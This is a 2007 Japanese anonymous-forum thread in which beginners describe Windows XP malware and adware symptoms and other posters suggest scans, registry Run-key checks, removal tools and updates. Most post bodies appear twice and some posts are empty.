511 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:11:29
隔離フォルダ
ノートンでも使ってたか?
ノートンでも使ってたか?
512 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:12:53
えっと、クエンティン・タランティーノであってますか?
513 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:29:48
普通に使ってただけですが
私はノートパソコンで飛ばした電波をキャッチして
インターネットを」やっていますが
私はノートパソコンで飛ばした電波をキャッチして
インターネットを」やっていますが
514 :513:2007/01/27(土) 19:02:29
無償ウィルス駆除ツールで駆除をおこなったら
ウイルスにかかっていないというメッセージがでました。
もうわけがわかりません。
参考までに 自分はインターネットをするためだけにパソコンを使っています。
自分のファイルなどはありませんし
メールの機能も一切使っていません。
いくらウイルスにかかっても失う物はなにもないって状態です。
まあそれでも他のユーザーの迷惑になるんとおもうのでウイルスは駆除したいです。
ウイルスにかかっていないというメッセージがでました。
もうわけがわかりません。
参考までに 自分はインターネットをするためだけにパソコンを使っています。
自分のファイルなどはありませんし
メールの機能も一切使っていません。
いくらウイルスにかかっても失う物はなにもないって状態です。
まあそれでも他のユーザーの迷惑になるんとおもうのでウイルスは駆除したいです。
515 :513:2007/01/27(土) 19:09:14
次から次えとすいません
お気に入りに入れた覚えのないものがありました
デスクトップとあって中身は下記のとうりです
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-173
[email protected],-12693
お気に入りに入れた覚えのないものがありました
デスクトップとあって中身は下記のとうりです
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-173
[email protected],-12693
516 :名無しさん@お腹いっぱい。:2007/01/27(土) 19:17:31
596 名前:名無し~3.EXE[] 投稿日:2007/01/27(土) 09:32:27 ID:Kft9BwlP
IE6のお気に入りに、ファイルの種類が「構成設定」
というファイルができていました。
名前はdesktopで、開けて見ると
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-173
[email protected],-12693
と書いてあったんですが、何でしょうか・・・
削除しようかと思ったんですが、
「削除すると危ないよ」みたいな警告が出ました。
ウイルスとかならセキュリティ板で聞いた方が良いでしょうか?
597 名前:名無し~3.EXE[] 投稿日:2007/01/27(土) 09:39:35 ID:9XILkebr
>>596
それはお気に入りのの★印フォルダのアイコンを指定してるファイル。ウイルスじゃない
598 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 09:39:59 ID:yxTSfWWZ
お気に入りフォルダのsystem.iniだなw
問題ないよ
IE6のお気に入りに、ファイルの種類が「構成設定」
というファイルができていました。
名前はdesktopで、開けて見ると
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-173
[email protected],-12693
と書いてあったんですが、何でしょうか・・・
削除しようかと思ったんですが、
「削除すると危ないよ」みたいな警告が出ました。
ウイルスとかならセキュリティ板で聞いた方が良いでしょうか?
597 名前:名無し~3.EXE[] 投稿日:2007/01/27(土) 09:39:35 ID:9XILkebr
>>596
それはお気に入りのの★印フォルダのアイコンを指定してるファイル。ウイルスじゃない
598 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 09:39:59 ID:yxTSfWWZ
お気に入りフォルダのsystem.iniだなw
問題ないよ
517 :名無しさん@お腹いっぱい。:2007/01/27(土) 19:19:14
599 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 09:48:31 ID:Kft9BwlP
>>597-598
ということは大丈夫なんですね。
ありがとうございます。よかったです。
再インストールしないといけないのかと思って
少しテンションが下がっていました・・。
ところで、それでも削除するとまずいんですよね?
お気に入りボタンを押すと出てくるんですが、
邪魔なのでどこかに移動したいのですが
どこへ移動させれば良いでしょうか?
とりあえず、お気に入りリストから
「デスクトップ」の画面まで異動させてみました。
601 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 10:05:52 ID:9XILkebr
>>599
普通は隠しファイルになってるはずだから、隠しファイルを表示しない設定にすればいいし。
どうしても気になるんだったら削除してもお気に入りフォルダのアイコンが
標準のアイコンに変わるだけだから消しても問題ないよ
>>597-598
ということは大丈夫なんですね。
ありがとうございます。よかったです。
再インストールしないといけないのかと思って
少しテンションが下がっていました・・。
ところで、それでも削除するとまずいんですよね?
お気に入りボタンを押すと出てくるんですが、
邪魔なのでどこかに移動したいのですが
どこへ移動させれば良いでしょうか?
とりあえず、お気に入りリストから
「デスクトップ」の画面まで異動させてみました。
601 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 10:05:52 ID:9XILkebr
>>599
普通は隠しファイルになってるはずだから、隠しファイルを表示しない設定にすればいいし。
どうしても気になるんだったら削除してもお気に入りフォルダのアイコンが
標準のアイコンに変わるだけだから消しても問題ないよ
518 :名無しさん@お腹いっぱい。:2007/01/27(土) 22:30:37
↑なに、これ?
519 :名無しさん@お腹いっぱい。:2007/01/27(土) 22:57:49
520 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:00:20
こんばんは
ウイルス来ました・・W32.Myzor.FKってやつなんですけど・・・・
よくわかりません・・・・・・
差し支えなければ、被害と駆除方法を・・・・
お願いします!
ウイルス来ました・・W32.Myzor.FKってやつなんですけど・・・・
よくわかりません・・・・・・
差し支えなければ、被害と駆除方法を・・・・
お願いします!
521 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:05:32
>520
>1
>1
すみません・・・・・
【使用OS】 ウィンドウズXP
【MicrosoftUpdate】
【使用セキュリティソフト】 ウイルスセキュリティゼロ
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です。
【ルータの有無】 ありません
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】していないのですが・・
【どんな症状が出るか】 エクスプローラーexeを終了しますと出る
【症状が出る前に何をやったか】 何も・・・
【症状を解決しようとどのような処置を取ったか】 とりあえずアンチを
【その他の質問】 インターネット起動してHPがhttp://awarninglist.com/になります
わからない事があってごめんさい・・・・
【使用OS】 ウィンドウズXP
【MicrosoftUpdate】
【使用セキュリティソフト】 ウイルスセキュリティゼロ
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です。
【ルータの有無】 ありません
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】していないのですが・・
【どんな症状が出るか】 エクスプローラーexeを終了しますと出る
【症状が出る前に何をやったか】 何も・・・
【症状を解決しようとどのような処置を取ったか】 とりあえずアンチを
【その他の質問】 インターネット起動してHPがhttp://awarninglist.com/になります
わからない事があってごめんさい・・・・
523 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:14:11
524 :522:2007/01/27(土) 23:16:27
525 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:35:56
526 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:25:02
Temp フォルダに 、 「 hsperfdata ユーザー名 」 というフォルダが たまに作られるんですけどウイルスにかかってますか ?
hsperfdata で検索したら 、 英語ページばっかりでよくわかりませんでした 。
hsperfdata で検索したら 、 英語ページばっかりでよくわかりませんでした 。
527 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:30:21
セキュリティ初心者質問スレッドpart70
2006 / 05 / 10 ( 水 ) 17 : 27 : 02:
Temp フォルダに 、 「 hsperfdata ユーザー名 」 というフォルダが たまに作られるんですけどウイルスにかかってますか ?
... hsperfdata で検索したら 、 英語ページばっかりでよくわかりませんでした 。 ...
2006 / 05 / 10 ( 水 ) 17 : 27 : 02:
Temp フォルダに 、 「 hsperfdata ユーザー名 」 というフォルダが たまに作られるんですけどウイルスにかかってますか ?
... hsperfdata で検索したら 、 英語ページばっかりでよくわかりませんでした 。 ...
528 :524:2007/01/28(日) 00:31:07
ありがとうございました!直りました!
529 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:39:15
>528
パスワードを変えておいたほうが吉かも
パスワードを変えておいたほうが吉かも
530 :507:2007/01/28(日) 01:01:30
>>507に答えてください
531 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:11:43
ファイルがすべてpugyaaaになるのはスレ違い?
ググればヒットするかと思ったが症例が少ないのだろうか…。
ググればヒットするかと思ったが症例が少ないのだろうか…。
532 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:18:44
>>530
隔離・検疫などにあるのを削除
隔離・検疫などにあるのを削除
533 :530:2007/01/28(日) 02:26:04
534 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:27:45
>>533
セキュリティソフトは?
セキュリティソフトは?
535 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:55:18
>>533
Cドライブにあるqurantineフォルダ開いて選択して削除
Cドライブにあるqurantineフォルダ開いて選択して削除
536 :530:2007/01/28(日) 03:50:04
537 :530:2007/01/28(日) 03:54:01
>>534セキュリティーソフトにはウイルスバスターがあります。
その後にウイルスチャイサーインストールしました。
その後にウイルスチャイサーインストールしました。
538 :名無しさん@お腹いっぱい。:2007/01/28(日) 04:13:37
539 :530:2007/01/28(日) 04:42:41
>>538おおっ!!親切な人ありがとう。
540 :530:2007/01/28(日) 04:48:49
541 :名無しさん@お腹いっぱい。:2007/01/28(日) 06:17:38
先生質問です!
ライムでエロ動画を落としたのですが、削除できないファイルがあります。右クリックしても削除が出てこないσ(^◇^;)
ウイルスバスターでウイルス検索かけてもhitしません。先生なら、どーしますか?
ライムでエロ動画を落としたのですが、削除できないファイルがあります。右クリックしても削除が出てこないσ(^◇^;)
ウイルスバスターでウイルス検索かけてもhitしません。先生なら、どーしますか?
自己解決。過去ログ39もしくはダウソ板か。
543 :名無しさん@お腹いっぱい。:2007/01/28(日) 10:53:08
すみません。本当に素人です。
ウィンドウズのXPを使用。
ウイルス対策は、 スパイボット、 無料バージョンを使用しています。
2日前からモニター画面上にメッセンジャーから
「アテンション!このメッセージを受け取ったなら貴方のIPアドレスは晒されている?<英語>」「セキュリティーからアラートへのお知らせ」「HOT SEXY FREE〜」
などのメッセージが頻繁に6枚くらい出続けます。
メッセージは右上の×を押せば消せるのですが警告音が鳴ります。
そして10分ほどでまた同じようなメッセージが出ます。
ウイルスに感染したのかと思い、仕方なくPCをフォーマットし、
スパイボット、スパイウエアボット、AVAS? を全て無料バージョンで入れましたが
状況は変わりません。
IPアドレスが出回ってると、もうどうしようもないのでしょうか?
あと、メールのやり取りから通販で購入したものや、自分の住所もばれてしまった可能性はあるでしょうか?
ウィンドウズのXPを使用。
ウイルス対策は、 スパイボット、 無料バージョンを使用しています。
2日前からモニター画面上にメッセンジャーから
「アテンション!このメッセージを受け取ったなら貴方のIPアドレスは晒されている?<英語>」「セキュリティーからアラートへのお知らせ」「HOT SEXY FREE〜」
などのメッセージが頻繁に6枚くらい出続けます。
メッセージは右上の×を押せば消せるのですが警告音が鳴ります。
そして10分ほどでまた同じようなメッセージが出ます。
ウイルスに感染したのかと思い、仕方なくPCをフォーマットし、
スパイボット、スパイウエアボット、AVAS? を全て無料バージョンで入れましたが
状況は変わりません。
IPアドレスが出回ってると、もうどうしようもないのでしょうか?
あと、メールのやり取りから通販で購入したものや、自分の住所もばれてしまった可能性はあるでしょうか?
544 :名無しさん@お腹いっぱい。:2007/01/28(日) 10:59:06
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】
545 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:21:46
>>543 です。
>>544
【使用OS】 ウィンドウズのXP プロバイダーはヤフーで8Mです。
【MicrosoftUpdate】 意味がわかりません。
【使用セキュリティソフト】 当初はスパイボットの無料
【セキュリティソフトの定義ファイルは最新の状態であるか】 意味がわかりませんが
スパイポッドは2日に一回アップデータしてウイルスチェックしていました。
【ルータの有無】 意味がわかりませんが無いと思います。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 特になし。
【どんな症状が出るか】 2日前からモニター画面上にメッセンジャーから
「アテンション!このメッセージを受け取ったなら貴方のIPアドレスは晒されている?<英語>」「セキュリティーからアラートへのお知らせ」「HOT SEXY FREE〜」
などのメッセージが頻繁に6枚くらい出続けます。
メッセージは右上の×を押せば消せるのですが警告音が鳴ります。
そして10分ほどでまた同じようなメッセージが出ます
【症状が出る前に何をやったか】 2チャンの閲覧・ネットでの通販(ニッセン等の一般的な所)くらい。
【症状を解決しようとどのような処置を取ったか】 スパイボットでウイルスチェック→ウイルス検出できないのでフォーマットしウインドウズ入れなおす。
スパイポッドの他、スパイウエアポッド、AVA?(どれも無料)を入れ、全部でウイルスの検索チェックするが出ない。
【その他の質問】
メールのやり取りから通販で購入したものや、自分の住所もばれてしまった可能性はあるでしょうか?
>>544
【使用OS】 ウィンドウズのXP プロバイダーはヤフーで8Mです。
【MicrosoftUpdate】 意味がわかりません。
【使用セキュリティソフト】 当初はスパイボットの無料
【セキュリティソフトの定義ファイルは最新の状態であるか】 意味がわかりませんが
スパイポッドは2日に一回アップデータしてウイルスチェックしていました。
【ルータの有無】 意味がわかりませんが無いと思います。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 特になし。
【どんな症状が出るか】 2日前からモニター画面上にメッセンジャーから
「アテンション!このメッセージを受け取ったなら貴方のIPアドレスは晒されている?<英語>」「セキュリティーからアラートへのお知らせ」「HOT SEXY FREE〜」
などのメッセージが頻繁に6枚くらい出続けます。
メッセージは右上の×を押せば消せるのですが警告音が鳴ります。
そして10分ほどでまた同じようなメッセージが出ます
【症状が出る前に何をやったか】 2チャンの閲覧・ネットでの通販(ニッセン等の一般的な所)くらい。
【症状を解決しようとどのような処置を取ったか】 スパイボットでウイルスチェック→ウイルス検出できないのでフォーマットしウインドウズ入れなおす。
スパイポッドの他、スパイウエアポッド、AVA?(どれも無料)を入れ、全部でウイルスの検索チェックするが出ない。
【その他の質問】
メールのやり取りから通販で購入したものや、自分の住所もばれてしまった可能性はあるでしょうか?
546 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:31:30
>>545です。
すみません。
×「セキュリティーからアラートへのお知らせ」
○ システムからアラートへのお知らせ でした。
全てメッセンジャーから来るもので、
内容はIPアドレスが晒されているとか、プライバシーが危険に晒されてる、SEX FREEがどうのの勧誘みたいなのです。
全部が英語メッセージなので良くわからないですし、メッセージを×を押して消すと
ピッっと警告の音がうるさいです。(音は消してあるのに警告音はなぜかします)
すみません。
×「セキュリティーからアラートへのお知らせ」
○ システムからアラートへのお知らせ でした。
全てメッセンジャーから来るもので、
内容はIPアドレスが晒されているとか、プライバシーが危険に晒されてる、SEX FREEがどうのの勧誘みたいなのです。
全部が英語メッセージなので良くわからないですし、メッセージを×を押して消すと
ピッっと警告の音がうるさいです。(音は消してあるのに警告音はなぜかします)
547 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:42:54
音を消してても警告音がなるのはBEEP音だからだろうな
カスペオンラインスキャンでもしてみたらどうかな?体験版もあるし。
Spybot-S&Dはスパイウェア対策であってウイルスはほとんど検知しないよ
AVAS?ってのはAVAST!の事かな?
PCをフォーマットしても全く同じ症状が出てるってのはおかしい事だから、リカバリしたつもりでいて復元しかしていないとかじゃないのかな?
復元だとウイルスやダウンローダ、スパイウェアごと復元してしまうよ
カスペオンラインスキャンでもしてみたらどうかな?体験版もあるし。
Spybot-S&Dはスパイウェア対策であってウイルスはほとんど検知しないよ
AVAS?ってのはAVAST!の事かな?
PCをフォーマットしても全く同じ症状が出てるってのはおかしい事だから、リカバリしたつもりでいて復元しかしていないとかじゃないのかな?
復元だとウイルスやダウンローダ、スパイウェアごと復元してしまうよ
548 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:44:29
>>545
Microsoft Update は、Windows Update で取得できるすべての更新プログラムに加え
Office およびその他の Microsoft アプリケーションを対象とする
優先度の高い更新プログラムを無料で提供するサービスです。
コントロールパネルのセキュリティセンターで自動更新の設定になっていますか?
Spybot S&Dはフリーのスパイウェア対策(予防と駆除)ソフトで、
基本的にはウイルス対策セキュリティソフトではありません。
ファイアウォールの付いた総合セキュリティソフトを入れて、
最低限ブラウザの設定を勉強しましょう
Microsoft Update は、Windows Update で取得できるすべての更新プログラムに加え
Office およびその他の Microsoft アプリケーションを対象とする
優先度の高い更新プログラムを無料で提供するサービスです。
コントロールパネルのセキュリティセンターで自動更新の設定になっていますか?
Spybot S&Dはフリーのスパイウェア対策(予防と駆除)ソフトで、
基本的にはウイルス対策セキュリティソフトではありません。
ファイアウォールの付いた総合セキュリティソフトを入れて、
最低限ブラウザの設定を勉強しましょう
549 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:52:19
exploitつかうタイプ
FW入れてMicrosoft Updateしないといつまでも同じ
マルウェア自体は多分これで消える
http://wiki.higaitaisaku.com/wiki.cgi?page=SmitfraudFix+%A4%CE%BB%C8%A4%A4%CA%FD
FW入れてMicrosoft Updateしないといつまでも同じ
マルウェア自体は多分これで消える
http://wiki.higaitaisaku.com/wiki.cgi?page=SmitfraudFix+%A4%CE%BB%C8%A4%A4%CA%FD
550 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:13:15
【使用OS】 WindowsXP HomeEdition(?)
【MicrosoftUpdateの状態】 多分していません
【使用セキュリティソフトとバージョン】 McAfree/Spybot
【セキュリティソフトの定義ファイルは最新の状態であるか】 McAfreeは不明ですが、Spybotは最新です
【ルータの有無】恐らくあります。無線LAN使用しています。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 検出無し
【どんな症状が出るか】 PCの電源を入れると普通にデスクトップが表示されます(右下のバー等も)
しかし起動してすぐ(1分程度)に、コマンドプロンプトの様な画面がチラッと出てきます(1行程何か書かれています)
それが表示された直後、PCの電源が切れてしまいます(電源の切れ方は正常です)
【症状が出る前に何をやったか】 vipロダの通常5〜15MBの中の72840か72836をDLしました。
解凍して中を開くと、画像を収録しているフォルダと別のフォルダ(?)が一つありました。
別のフォルダの中にReadMeの様な物があり、そこに書かれている手順に従って同フォルダ内の解凍ソフトを使用しました。
解凍する際に、コマンドプロンプト系の窓が開いたので少し不安だったのですが、とりあえず続行してみました。
すると、解凍(?)を終えた直後にPCの電源が切れました。
【症状を解決しようとどのような処置を取ったか】 SpybotとMcAfeeでスキャンしました。
McAfeeでのヒットは0件、Spybotでは16件程見つかったので全て削除しました。
現在SymantecSecurityCheckを行っています。現時点で感染ファイル4件
【その他の質問】 PCはノートパソコンです。
ニュー速vipで同じウイルスにHITした人が居て、その人はPCの初期化を行ったようです。
自分はバックアップの事がよく分からないので初期化は避けたいと思っています。
※ウイルスに引っかかった後の行動は全てセーフモードで行っています
【MicrosoftUpdateの状態】 多分していません
【使用セキュリティソフトとバージョン】 McAfree/Spybot
【セキュリティソフトの定義ファイルは最新の状態であるか】 McAfreeは不明ですが、Spybotは最新です
【ルータの有無】恐らくあります。無線LAN使用しています。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 検出無し
【どんな症状が出るか】 PCの電源を入れると普通にデスクトップが表示されます(右下のバー等も)
しかし起動してすぐ(1分程度)に、コマンドプロンプトの様な画面がチラッと出てきます(1行程何か書かれています)
それが表示された直後、PCの電源が切れてしまいます(電源の切れ方は正常です)
【症状が出る前に何をやったか】 vipロダの通常5〜15MBの中の72840か72836をDLしました。
解凍して中を開くと、画像を収録しているフォルダと別のフォルダ(?)が一つありました。
別のフォルダの中にReadMeの様な物があり、そこに書かれている手順に従って同フォルダ内の解凍ソフトを使用しました。
解凍する際に、コマンドプロンプト系の窓が開いたので少し不安だったのですが、とりあえず続行してみました。
すると、解凍(?)を終えた直後にPCの電源が切れました。
【症状を解決しようとどのような処置を取ったか】 SpybotとMcAfeeでスキャンしました。
McAfeeでのヒットは0件、Spybotでは16件程見つかったので全て削除しました。
現在SymantecSecurityCheckを行っています。現時点で感染ファイル4件
【その他の質問】 PCはノートパソコンです。
ニュー速vipで同じウイルスにHITした人が居て、その人はPCの初期化を行ったようです。
自分はバックアップの事がよく分からないので初期化は避けたいと思っています。
※ウイルスに引っかかった後の行動は全てセーフモードで行っています
551 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:16:31
連レスすいません。SymantecSecurityCheckでのスキャンが終わりました。
感染しているのが4つ見つかったので書き込んでおきます。
SystemDoctor に感染しています。
VBS.Freelink.B に感染しています。
SystemDoctor に感染しています。
SystemDoctor に感染しています。
感染しているのが4つ見つかったので書き込んでおきます。
SystemDoctor に感染しています。
VBS.Freelink.B に感染しています。
SystemDoctor に感染しています。
SystemDoctor に感染しています。
552 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:28:40
>>551
釣り乙
釣り乙
553 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:44:06
>>552
何故釣りと断定されてるかは分かりませんが、本当に困ってます。。
何故釣りと断定されてるかは分かりませんが、本当に困ってます。。
554 :名無しさん@お腹いっぱい。:2007/01/28(日) 12:58:52
555 :名無しさん@お腹いっぱい。:2007/01/28(日) 13:19:02
556 :名無しさん@お腹いっぱい。:2007/01/28(日) 13:34:53
557 :名無しさん@お腹いっぱい。:2007/01/28(日) 13:58:36
558 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:38:52
すみません質問です。
ウィルスセキュリティーを使ってるんですが
「トロイの木馬を対処しました」
「セキュリティーレベルを低から中へ引き上げました」
とメッセージがでたんですが、トロイの木馬とやらはどこへいってしまったんでしょうか?
対処=消去? 本当に安全なのか不安です。どなたかご教授願います
ウィルスセキュリティーのスレで質問したんですがからかわれてしまいまして…
ウィルスセキュリティーを使ってるんですが
「トロイの木馬を対処しました」
「セキュリティーレベルを低から中へ引き上げました」
とメッセージがでたんですが、トロイの木馬とやらはどこへいってしまったんでしょうか?
対処=消去? 本当に安全なのか不安です。どなたかご教授願います
ウィルスセキュリティーのスレで質問したんですがからかわれてしまいまして…
559 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:49:04
そりゃそのソフトのスレに行って聞けよ
560 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:51:46
561 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:53:43
>>557
.batで電源切るよう仕込んでおき→再起動→マルウェアインストール完了
そnな希ガス
SystemDoctorはプログラムの追加と削除からアンインストールできるはず
レジストリにも書き込みあるはずだからレジストリをSystemDoctorで検索→削除
VBS.Freelink.B→ノートントラップ→放置
ほかにも感染してたらシラネ
.batで電源切るよう仕込んでおき→再起動→マルウェアインストール完了
そnな希ガス
SystemDoctorはプログラムの追加と削除からアンインストールできるはず
レジストリにも書き込みあるはずだからレジストリをSystemDoctorで検索→削除
VBS.Freelink.B→ノートントラップ→放置
ほかにも感染してたらシラネ
562 :名無しさん@お腹いっぱい。:2007/01/28(日) 14:59:20
VBS.Freelink.B はスキャンにもひっかかるから気になるならノートンアンチウィルスを開いて
レポート→検疫と復元を表示→セキュリティの脅威を選択→削除
で消える
ウィルスコード貼ってあるスレにでも行けばまたすぐできてるだろうけど
レポート→検疫と復元を表示→セキュリティの脅威を選択→削除
で消える
ウィルスコード貼ってあるスレにでも行けばまたすぐできてるだろうけど
563 :名無しさん@お腹いっぱい。:2007/01/28(日) 15:01:43
>>562
だんな オンラインスキャンでっせ
だんな オンラインスキャンでっせ
564 :名無しさん@お腹いっぱい。:2007/01/28(日) 15:31:23
AVAST!ってウィルスフリー駆除ソフトつかってるんだけど
昨日普通のいつもひらいてるファイルひらこうとしたら今
トロイの木馬がみつかりました!!とかいわれたんだけど・・・
いつもひらいてる普通のファイルだったし
これフリーソフトだし、ノートン先生は発動しなかったしエラー?
とおもって
ほっとく押してしまったんですけど、これは感染してるのでしょうか?(´・ω・`)
だとしたら駆除されてないですよね?
昨日普通のいつもひらいてるファイルひらこうとしたら今
トロイの木馬がみつかりました!!とかいわれたんだけど・・・
いつもひらいてる普通のファイルだったし
これフリーソフトだし、ノートン先生は発動しなかったしエラー?
とおもって
ほっとく押してしまったんですけど、これは感染してるのでしょうか?(´・ω・`)
だとしたら駆除されてないですよね?
565 :名無しさん@お腹いっぱい。:2007/01/28(日) 15:35:59
>>557
あと起動時に電源が切れるのは.batが自動起動エントリに追加されてるからだろな
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
周りに怪しい.batがないかチェック
みつかったらバックアップとって削除 問題なければそのまま削除
わけわかんないなら アダ被行くかリカバリ推奨
あと起動時に電源が切れるのは.batが自動起動エントリに追加されてるからだろな
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
周りに怪しい.batがないかチェック
みつかったらバックアップとって削除 問題なければそのまま削除
わけわかんないなら アダ被行くかリカバリ推奨
566 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:27:54
567 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:28:14
オンラインスキャンってどこでやるの?
どこにあるの?
どこにあるの?
568 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:30:51
このスレの>>8
569 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:47:21
570 :名無しさん@お腹いっぱい。:2007/01/28(日) 16:59:24
>>569
>>1のテンプレをつかって状況をさらに詳しく
ファイルサイズが10MB以下ならhttp://www.virustotal.comにアップロードしてみて
他のアンチウイルスベンダーのスキャン結果をみてみる
avastはちょくちょく誤検出をおこすのでその可能性も大
>>1のテンプレをつかって状況をさらに詳しく
ファイルサイズが10MB以下ならhttp://www.virustotal.comにアップロードしてみて
他のアンチウイルスベンダーのスキャン結果をみてみる
avastはちょくちょく誤検出をおこすのでその可能性も大
571 :545:2007/01/28(日) 17:56:40
>>547->>549
レスありがとうございます。
もう一度、パーテーションのフォーマットと、549さんに教えていただいたのをやってみましたが駄目でした。
メッセンジャーサービスから、私のIPアドレスに送ってくるようですので
IPを変えるしかないのでしょうか?
そもそも、メッセンジャーサービスなるものがわからない。
プロバイダーを変えたらIPアドレスは変更できるのでしょうか???
レスありがとうございます。
もう一度、パーテーションのフォーマットと、549さんに教えていただいたのをやってみましたが駄目でした。
メッセンジャーサービスから、私のIPアドレスに送ってくるようですので
IPを変えるしかないのでしょうか?
そもそも、メッセンジャーサービスなるものがわからない。
プロバイダーを変えたらIPアドレスは変更できるのでしょうか???
572 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:02:43
なんか中華系のサイトが定期的に開くんだよ・・・
最終的にOS読み込まずに立ち上がらなくなる
リカバリーしても一緒・・・
最悪
対処法あればよろしく
最終的にOS読み込まずに立ち上がらなくなる
リカバリーしても一緒・・・
最悪
対処法あればよろしく
573 : ◆N9P3SuvBPo :2007/01/28(日) 18:05:17
>545-546
解決したか?
症状は「メッセンジャーから英文のメッセージが届く」ということですよね。
これは恐らく、"メッセンジャースパム"のものだと思います。
対処方法を記載しておくので、参考に
ttp://www.higaitaisaku.com/messengerspam.html
解決したか?
症状は「メッセンジャーから英文のメッセージが届く」ということですよね。
これは恐らく、"メッセンジャースパム"のものだと思います。
対処方法を記載しておくので、参考に
ttp://www.higaitaisaku.com/messengerspam.html
574 : ◆N9P3SuvBPo :2007/01/28(日) 18:08:04
>572
>リカバリーしても一緒・・・
マジっすか?
中華系のサイトが開くだけなら、リカバリで直るはずなんだけど…
他に何か症状とかは無いんですよね?
>リカバリーしても一緒・・・
マジっすか?
中華系のサイトが開くだけなら、リカバリで直るはずなんだけど…
他に何か症状とかは無いんですよね?
575 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:11:01
>>574
このスレの>>394をとりあえず実行してみた
俺の場合は古い型のPCなんでwin98をインスコしてからXPいれるんだけど
win98なら何も反応せず、XPをいれたとたんに中華系サイトが開き出す。
このスレの>>394をとりあえず実行してみた
俺の場合は古い型のPCなんでwin98をインスコしてからXPいれるんだけど
win98なら何も反応せず、XPをいれたとたんに中華系サイトが開き出す。
576 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:14:05
他の症状といえば
例えばCドライブを開いたり、外付けHDDを開いただけで
デスクトップ上に中華サイトにアクセスするIEのアイコンがでます
で、どんどんサイトが開いて、PCが落ちる
それからはOSすら読み込んでくれない・・・・
これ最悪
例えばCドライブを開いたり、外付けHDDを開いただけで
デスクトップ上に中華サイトにアクセスするIEのアイコンがでます
で、どんどんサイトが開いて、PCが落ちる
それからはOSすら読み込んでくれない・・・・
これ最悪
577 : ◆N9P3SuvBPo :2007/01/28(日) 18:29:54
>576
Fujacks系ウイルスかな?
(win98からwinXPにグレードアップしたら、症状発生か…)
Win98からWinXPにする間は、ネットから切った状態でやってる?
あと、もしFujacks系なら感染したファイル(拡張子がexe)のアイコンが
パンダや犬など動物のアイコンに変化するのだが、
この症状は、無かったですか?
Fujacks系ウイルスかな?
(win98からwinXPにグレードアップしたら、症状発生か…)
Win98からWinXPにする間は、ネットから切った状態でやってる?
あと、もしFujacks系なら感染したファイル(拡張子がexe)のアイコンが
パンダや犬など動物のアイコンに変化するのだが、
この症状は、無かったですか?
578 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:36:20
579 : ◆N9P3SuvBPo :2007/01/28(日) 18:38:17
>578
正規ファイル問題ありません。
現在、中華系サイトが開くといった症状は?
正規ファイル問題ありません。
現在、中華系サイトが開くといった症状は?
580 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:40:45
>>579
現在は98に戻してるので問題はありません
現在は98に戻してるので問題はありません
581 :名無しさん@お腹いっぱい。:2007/01/28(日) 18:43:22
もう一回XP入れます。
次はLANはずしてやってみます
次はLANはずしてやってみます
